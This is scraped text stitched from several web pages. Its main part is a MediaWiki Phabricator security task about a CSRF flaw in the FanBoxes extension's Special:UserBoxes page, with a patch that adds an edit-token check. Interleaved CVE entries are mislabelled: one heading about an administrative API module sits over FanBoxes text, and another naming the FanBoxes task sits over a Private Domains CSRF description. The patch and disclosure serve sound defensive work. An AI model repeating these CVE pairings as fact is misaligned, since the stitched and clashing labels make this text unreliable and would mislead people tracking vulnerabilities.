Finally closing this as the patch was merged about a month ago (oops). @Legoktm's note regarding Special:QuizGameHome is worth investigating, but that's a separate matter altogether. (Social-Tools basically have no knowledge and thus no support for the concept of partial blocks; you're either blocked or not, social tools don't currently care about how partial the block is.)

Content licensed under Creative Commons Attribution-ShareAlike 3.0 (CC-BY-SA) unless otherwise noted; code licensed under GNU General Public License (GPL) or other open source licenses. By using this site, you agree to the Terms of Use, Privacy Policy, and Code of Conduct. · Wikimedia Foundation · Privacy Policy · Code of Conduct · Terms of Use · Disclaimer · CC-BY-SA · GPL

CVE-2022-29906: Administrative API module lets unauthenticated requests through

The FanBoxes extension for MediaWiki through 1.37.2 (before 027ffb0b9d6fe0d823810cf03f5b562a212162d4) allows Special:UserBoxes CSRF.

**

FanBoxes: classic CSRF in Special:UserBoxes

Closed, ResolvedPublicSecurity



**

*   Edit Task
*   Edit Related Tasks...
*   Edit Related Objects...

*   Mute Notifications
*   Protect as security issue
*   Award Token
*   Flag For Later

Special:UserBoxes, the special page used to create new social user boxes and edit existing ones (pages in the UserBox: namespace), does not check for the presence of an anti-CSRF token, it will happily create/update the requested page as long as the request was POSTed and the desired form fields are set.

Quick patch:

diff --git a/includes/specials/SpecialFanBoxes.php b/includes/specials/SpecialFanBoxes.php
index aac26be..7835e2d 100644
\--- a/includes/specials/SpecialFanBoxes.php
+++ b/includes/specials/SpecialFanBoxes.php
@@ -115,6 +115,7 @@ class FanBoxes extends SpecialPage {
                        $output .= Html::hidden( 'textColorLeftSideColor', $update\_fan->getFanBoxLeftTextColor(), \[ 'id' => 'textColorLeftSideColor' \] ) . "\\n";
                        $output .= Html::hidden( 'bgColorRightSideColor', $update\_fan->getFanBoxRightBgColor(), \[ 'id' => 'bgColorRightSideColor' \] ) . "\\n";
                        $output .= Html::hidden( 'textColorRightSideColor', $update\_fan->getFanBoxRightTextColor(), \[ 'id' => 'textColorRightSideColor' \] ) . "\\n";
\+                       $output .= Html::hidden( 'wpEditToken', $user->getEditToken() );
 
                        $fantag\_image\_tag = '';
                        if ( $update\_fan->getFanBoxImage() ) {
@@ -254,6 +255,8 @@ class FanBoxes extends SpecialPage {
                        <input type="hidden" name="bgColorRightSideColor" id="bgColorRightSideColor" value="" />
                        <input type="hidden" name="textColorRightSideColor" id="textColorRightSideColor" value="" />';
 
\+                       $output .= Html::hidden( 'wpEditToken', $user->getEditToken() );
+
                        if ( !$destination ) {
                                $output .= '<h2 class="fanbox-form-label">' . $this->msg( 'fanbox-title' )->escaped() . '</h2>
                                        <div class="create-fanbox-title">
@@ -330,6 +333,13 @@ class FanBoxes extends SpecialPage {
 
                // Send values to database and create fantag page when form is submitted
                if ( $request->wasPosted() ) {
\+                       // Protect against CSRF
\+                       if ( !$user->matchEditToken( $request->getVal( 'wpEditToken' ) ) ) {
\+                               $out->addWikiMsg( 'sessionfailure' );
\+                               $out->addReturnTo( $this->getPageTitle() );
\+                               return;
\+                       }
+
                        if ( !$fanboxId ) {
                                // @phan-suppress-next-line PhanTypeMismatchArgumentNullable
                                $fan = FanBox::newFromName( $title );

**Event Timeline**

Content licensed under Creative Commons Attribution-ShareAlike 3.0 (CC-BY-SA) unless otherwise noted; code licensed under GNU General Public License (GPL) or other open source licenses. By using this site, you agree to the Terms of Use, Privacy Policy, and Code of Conduct. · Wikimedia Foundation · Privacy Policy · Code of Conduct · Terms of Use · Disclaimer · CC-BY-SA · GPL

CVE-2022-29905: ⚓ T306741 FanBoxes: classic CSRF in Special:UserBoxes

The Private Domains extension for MediaWiki through 1.37.2 (before 1ad65d4c1c199b375ea80988d99ab51ae068f766) allows CSRF for editing pages that store the extension's configuration. The attacker must trigger a POST request to Special:PrivateDomains.

To use PolyGerrit, please enable JavaScript in your browser settings, and then refresh this page.

Tag

#csrf